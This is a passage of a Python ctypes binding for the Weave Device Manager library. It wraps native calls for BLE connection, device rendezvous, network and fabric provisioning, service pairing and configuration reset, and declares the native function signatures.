raise self._ErrorToException(res)
def TestResultBle(self, connObj, local):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_TestResultBle(self.devMgr, connObj, local)
)
if (res != 0):
raise self._ErrorToException(res)
def TestAbortBle(self, connObj):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_TestAbortBle(self.devMgr, connObj)
)
if (res != 0):
raise self._ErrorToException(res)
def TxTimingBle(self, connObj, enabled, remote):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_TxTimingBle(self.devMgr, connObj, enabled, remote)
)
if (res != 0):
raise self._ErrorToException(res)
# end of BLE testing methods
def ConnectBle(self, bleConnection, pairingCode=None, accessToken=None):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.ConnectBle')
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth(self.devMgr, bleConnection, self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode(self.devMgr, bleConnection, _StringToCString(pairingCode), self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken(self.devMgr, bleConnection, _ByteArrayToVoidPtr(accessToken), len(accessToken), self.cbHandleComplete, self.cbHandleError)
)
def PassiveRendezvousDevice(self, pairingCode=None, accessToken=None):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.PassiveRendezvousDevice')
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode(self.devMgr, _StringToCString(pairingCode), self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken(self.devMgr, _ByteArrayToVoidPtr(accessToken), len(accessToken), self.cbHandleComplete, self.cbHandleError)
)
def RemotePassiveRendezvous(self, rendezvousDeviceAddr=None, pairingCode=None, accessToken=None, rendezvousTimeout=None, inactivityTimeout=None):
if rendezvousDeviceAddr == None:
rendezvousDeviceAddr = "::"
if '\x00' in rendezvousDeviceAddr:
raise ValueError("Unexpected NUL character in rendezvousDeviceAddr")
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth(self.devMgr, _StringToCString(rendezvousDeviceAddr), rendezvousTimeout, inactivityTimeout, self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth(self.devMgr, _StringToCString(rendezvousDeviceAddr), _StringToCString(pairingCode), rendezvousTimeout, inactivityTimeout, self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth(self.devMgr, _StringToCString(rendezvousDeviceAddr), _ByteArrayToVoidPtr(accessToken), len(accessToken), rendezvousTimeout, inactivityTimeout, self.cbHandleComplete, self.cbHandleError)
)
def ReconnectDevice(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ReconnectDevice(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def Close(self):
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_Close(self.devMgr)
)
def EnableConnectionMonitor(self, interval, timeout):
if interval < 0 or interval > pow(2,16):
raise ValueError("interval must be an unsigned 16-bit unsigned value")
if timeout < 0 or timeout > pow(2,16):
raise ValueError("timeout must be an unsigned 16-bit unsigned value")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor(self.devMgr, interval, timeout, self.cbHandleComplete, self.cbHandleError)
)
def DisableConnectionMonitor(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def IdentifyDevice(self):
def HandleIdentifyDeviceComplete(devMgr, reqState, deviceDescPtr):
self.callbackRes = deviceDescPtr.contents.toDeviceDescriptor()
self.completeEvent.set()
cbHandleIdentifyDeviceComplete = _IdentifyDeviceCompleteFunct(HandleIdentifyDeviceComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_IdentifyDevice(self.devMgr, cbHandleIdentifyDeviceComplete, self.cbHandleError)
)
def PairToken(self, pairingToken):
def HandlePairTokenComplete(devMgr, reqState, tokenPairingBundlePtr, tokenPairingBundleLen):
self.callbackRes = _VoidPtrToByteArray(tokenPairingBundlePtr, tokenPairingBundleLen)
self.completeEvent.set()
cbHandlePairTokenComplete = _PairTokenCompleteFunct(HandlePairTokenComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_PairToken(self.devMgr, _ByteArrayToVoidPtr(pairingToken), len(pairingToken), cbHandlePairTokenComplete, self.cbHandleError)
)
def UnpairToken(self):
def HandleUnpairTokenComplete(devMgr, reqState):
self.callbackRes = True
self.completeEvent.set()
cbHandleUnpairTokenComplete = _UnpairTokenCompleteFunct(HandleUnpairTokenComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_UnpairToken(self.devMgr, cbHandleUnpairTokenComplete, self.cbHandleError)
)
def ScanNetworks(self, networkType):
def HandleScanNetworksComplete(devMgr, reqState, netCount, netInfoPtr):
self.callbackRes = [ netInfoPtr[i].toNetworkInfo() for i in range(netCount) ]
self.completeEvent.set()
cbHandleScanNetworksComplete = _NetworkScanCompleteFunct(HandleScanNetworksComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ScanNetworks(self.devMgr, networkType, cbHandleScanNetworksComplete, self.cbHandleError)
)
def GetNetworks(self, getFlags):
def HandleGetNetworksComplete(devMgr, reqState, netCount, netInfoPtr):
self.callbackRes = [ netInfoPtr[i].toNetworkInfo() for i in range(netCount) ]
self.completeEvent.set()
cbHandleGetNetworksComplete = _GetNetworksCompleteFunct(HandleGetNetworksComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetNetworks(self.devMgr, getFlags, cbHandleGetNetworksComplete, self.cbHandleError)
)
def GetCameraAuthData(self, nonce):
if nonce is not None and '\x00' in nonce:
raise ValueError("Unexpected NUL character in nonce")
def HandleGetCameraAuthDataComplete(devMgr, reqState, macAddress, signedCameraPayload):
self.callbackRes = [ _CStringToString(macAddress), _CStringToString(signedCameraPayload) ]
self.completeEvent.set()
cbHandleGetCameraAuthDataComplete = _GetCameraAuthDataCompleteFunct(HandleGetCameraAuthDataComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetCameraAuthData(self.devMgr, _StringToCString(nonce), cbHandleGetCameraAuthDataComplete, self.cbHandleError)
)
def AddNetwork(self, networkInfo):
def HandleAddNetworkComplete(devMgr, reqState, networkId):
self.callbackRes = networkId
self.completeEvent.set()
cbHandleAddNetworkComplete = _AddNetworkCompleteFunct(HandleAddNetworkComplete)
networkInfoStruct = _NetworkInfoStruct.fromNetworkInfo(networkInfo)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_AddNetwork(self.devMgr, networkInfoStruct, cbHandleAddNetworkComplete, self.cbHandleError)
)
def UpdateNetwork(self, networkInfo):
networkInfoStruct = _NetworkInfoStruct.fromNetworkInfo(networkInfo)
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_UpdateNetwork(self.devMgr, networkInfoStruct, self.cbHandleComplete, self.cbHandleError)
)
def RemoveNetwork(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RemoveNetwork(self.devMgr, networkId, self.cbHandleComplete, self.cbHandleError)
)
def EnableNetwork(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_EnableNetwork(self.devMgr, networkId, self.cbHandleComplete, self.cbHandleError)
)
def DisableNetwork(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_DisableNetwork(self.devMgr, networkId, self.cbHandleComplete, self.cbHandleError)
)
def TestNetworkConnectivity(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity(self.devMgr, networkId, self.cbHandleComplete, self.cbHandleError)
)
def GetRendezvousMode(self):
def HandleGetRendezvousModeComplete(devMgr, reqState, modeFlags):
self.callbackRes = modeFlags
self.completeEvent.set()
cbHandleGetRendezvousModeComplete = _GetRendezvousModeCompleteFunct(HandleGetRendezvousModeComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetRendezvousMode(self.devMgr, cbHandleGetRendezvousModeComplete, self.cbHandleError)
)
def SetRendezvousMode(self, modeFlags):
if modeFlags < 0 or modeFlags > pow(2,16):
raise ValueError("modeFlags must be an unsigned 16-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_SetRendezvousMode(self.devMgr, modeFlags, self.cbHandleComplete, self.cbHandleError)
)
def GetLastNetworkProvisioningResult(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def CreateFabric(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_CreateFabric(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def LeaveFabric(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_LeaveFabric(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def GetFabricConfig(self):
def HandleGetFabricConfigComplete(devMgr, reqState, fabricConfigPtr, fabricConfigLen):
self.callbackRes = _VoidPtrToByteArray(fabricConfigPtr, fabricConfigLen)
self.completeEvent.set()
cbHandleGetFabricConfigComplete = _GetFabricConfigCompleteFunct(HandleGetFabricConfigComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetFabricConfig(self.devMgr, cbHandleGetFabricConfigComplete, self.cbHandleError)
)
def JoinExistingFabric(self, fabricConfig):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_JoinExistingFabric(self.devMgr, _ByteArrayToVoidPtr(fabricConfig), len(fabricConfig),
self.cbHandleComplete, self.cbHandleError)
)
def Ping(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_Ping(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def RegisterServicePairAccount(self, serviceId, accountId, serviceConfig, pairingToken, pairingInitData):
if accountId is not None and '\x00' in accountId:
raise ValueError("Unexpected NUL character in accountId")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount(self.devMgr, serviceId, _StringToCString(accountId),
_ByteArrayToVoidPtr(serviceConfig), len(serviceConfig),
_ByteArrayToVoidPtr(pairingToken), len(pairingToken),
_ByteArrayToVoidPtr(pairingInitData), len(pairingInitData),
self.cbHandleComplete, self.cbHandleError)
)
def UpdateService(self, serviceId, serviceConfig):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_UpdateService(self.devMgr, serviceId, _ByteArrayToVoidPtr(serviceConfig),
len(serviceConfig), self.cbHandleComplete, self.cbHandleError)
)
def UnregisterService(self, serviceId):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_UnregisterService(self.devMgr, serviceId, self.cbHandleComplete, self.cbHandleError)
)
def ArmFailSafe(self, armMode, failSafeToken):
if armMode < 0 or armMode > pow(2, 8):
raise ValueError("armMode must be an unsigned 8-bit integer")
if failSafeToken < 0 or failSafeToken > pow(2, 32):
raise ValueError("failSafeToken must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ArmFailSafe(self.devMgr, armMode, failSafeToken, self.cbHandleComplete, self.cbHandleError)
)
def DisarmFailSafe(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_DisarmFailSafe(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def ResetConfig(self, resetFlags):
if resetFlags < 0 or resetFlags > pow(2, 16):
raise ValueError("resetFlags must be an unsigned 16-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ResetConfig(self.devMgr, resetFlags, self.cbHandleComplete, self.cbHandleError)
)
def CloseEndpoints(self):
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_CloseEndpoints()
)
def Shutdown(self):
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_Shutdown()
)
def SetLogFilter(self, category):
if category < 0 or category > pow(2, 8):
raise ValueError("category must be an unsigned 8-bit integer")
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_SetLogFilter(category)
)
def GetLogFilter(self):
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_GetLogFilter()
)
def SetBlockingCB(self, blockingCB):
self.blockingCB = blockingCB
def StartSystemTest(self, profileId, testId):
if profileId < 0 or profileId > pow(2, 32):
raise ValueError("profileId must be an unsigned 32-bit integer")
if testId < 0 or testId > pow(2, 32):
raise ValueError("testId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_StartSystemTest(self.devMgr, profileId, testId, self.cbHandleComplete, self.cbHandleError)
)
def StopSystemTest(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_StopSystemTest(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
# ----- Private Members -----
def _InitLib(self):
global _dmLib
if (_dmLib == None):
_dmLib = CDLL(_LocateWeaveDLL())
_dmLib.nl_Weave_DeviceManager_Init.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_Init.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_Shutdown.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_Shutdown.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_NewDeviceManager.argtypes = [ POINTER(c_void_p) ]
_dmLib.nl_Weave_DeviceManager_NewDeviceManager.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_DeleteDeviceManager.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_DeleteDeviceManager.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_Close.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_Close.restype = None
_dmLib.nl_Weave_DeviceManager_DriveIO.argtypes = [ c_uint32 ]
_dmLib.nl_Weave_DeviceManager_DriveIO.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_WakeForBleIO.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_WakeForBleIO.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetBleEventCB.argtypes = [ _GetBleEventFunct ]
_dmLib.nl_Weave_DeviceManager_SetBleEventCB.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic.argtypes = [ _WriteBleCharacteristicFunct ]
_dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic.argtypes = [ _SubscribeBleCharacteristicFunct ]
_dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetBleClose.argtypes = [ _CloseBleFunct ]
_dmLib.nl_Weave_DeviceManager_SetBleClose.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_IsConnected.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_IsConnected.restype = c_bool
_dmLib.nl_Weave_DeviceManager_DeviceId.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_DeviceId.restype = c_uint64
_dmLib.nl_Weave_DeviceManager_DeviceAddress.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_DeviceAddress.restype = c_char_p
_dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration.argtypes = [ c_void_p, POINTER(_IdentifyDeviceCriteriaStruct), _DeviceEnumerationResponseFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration.restype = None
_dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth.argtypes = [ c_void_p, c_uint64, c_char_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode.argtypes = [ c_void_p, c_uint64, c_char_p, c_char_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken.argtypes = [ c_void_p, c_uint64, c_char_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth.argtypes = [ c_void_p, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode.argtypes = [ c_void_p, c_char_p, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken.argtypes = [ c_void_p, c_void_p, c_uint32, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode.argtypes = [ c_void_p, c_char_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken.argtypes = [ c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TestBle.argtypes = [ c_void_p, c_void_p, _CompleteFunct, _ErrorFunct, c_uint32, c_uint32, c_uint16, c_uint8, c_uint16, c_bool ]
_dmLib.nl_Weave_DeviceManager_TestBle.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TestResultBle.argtypes = [ c_void_p, c_void_p, c_bool ]
_dmLib.nl_Weave_DeviceManager_TestResultBle.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TestAbortBle.argtypes = [ c_void_p, c_void_p ]
_dmLib.nl_Weave_DeviceManager_TestAbortBle.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TxTimingBle.argtypes = [ c_void_p, c_void_p, c_bool, c_bool ]
_dmLib.nl_Weave_DeviceManager_TxTimingBle.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth.argtypes = [ c_void_p, c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode.argtypes = [ c_void_p, c_void_p, c_char_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken.argtypes = [ c_void_p, c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth.argtypes = [ c_void_p, c_char_p, c_char_p, c_uint32, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth.argtypes = [ c_void_p, c_char_p, c_char_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth.argtypes = [ c_void_p, c_char_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ReconnectDevice.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ReconnectDevice.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor.argtypes = [ c_void_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_IdentifyDevice.argtypes = [ c_void_p, _IdentifyDeviceCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_IdentifyDevice.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_PairToken.argtypes = [ c_void_p, c_void_p, c_uint32, _PairTokenCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_PairToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_UnpairToken.argtypes = [ c_void_p, _UnpairTokenCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_UnpairToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ScanNetworks.argtypes = [ c_void_p, c_int, _NetworkScanCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ScanNetworks.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetNetworks.argtypes = [ c_void_p, c_int, _GetNetworksCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetNetworks.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetCameraAuthData.argtypes = [ c_void_p, c_char_p, _GetCameraAuthDataCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetCameraAuthData.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_AddNetwork.argtypes = [ c_void_p, POINTER(_NetworkInfoStruct), _AddNetworkCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_AddNetwork.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_UpdateNetwork.argtypes = [ c_void_p, POINTER(_NetworkInfoStruct), _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_UpdateNetwork.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RemoveNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RemoveNetwork.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_EnableNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_EnableNetwork.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_DisableNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_DisableNetwork.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetRendezvousMode.argtypes = [ c_void_p, _GetRendezvousModeCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetRendezvousMode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetRendezvousMode.argtypes = [ c_void_p, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_SetRendezvousMode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_CreateFabric.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_CreateFabric.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_LeaveFabric.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_LeaveFabric.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetFabricConfig.argtypes = [ c_void_p, _GetFabricConfigCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetFabricConfig.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_JoinExistingFabric.argtypes = [ c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_JoinExistingFabric.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_Ping.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_Ping.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.argtypes = [ c_void_p, c_char_p, c_char_p ]
_dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetConnectTimeout.argtypes = [ c_void_p, c_uint32 ]
_dmLib.nl_Weave_DeviceManager_SetConnectTimeout.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetAutoReconnect.argtypes = [ c_void_p, c_bool ]
_dmLib.nl_Weave_DeviceManager_SetAutoReconnect.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal.argtypes = [ c_void_p, c_bool ]
_dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount.argtypes = [ c_void_p, c_uint64, c_char_p, c_void_p, c_uint32, c_void_p, c_uint32, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_UpdateService.argtypes = [ c_void_p, c_uint64, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_UpdateService.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_UnregisterService.argtypes = [ c_void_p, c_uint64, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_UnregisterService.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ArmFailSafe.argtypes = [ c_void_p, c_uint8, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ArmFailSafe.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_DisarmFailSafe.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_DisarmFailSafe.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ResetConfig.argtypes = [ c_void_p, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ResetConfig.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ErrorToString.argtypes = [ c_uint32 ]
_dmLib.nl_Weave_DeviceManager_ErrorToString.restype = c_char_p
_dmLib.nl_Weave_DeviceManager_StatusReportToString.argtypes = [ c_uint32, c_uint16 ]
_dmLib.nl_Weave_DeviceManager_StatusReportToString.restype = c_char_p
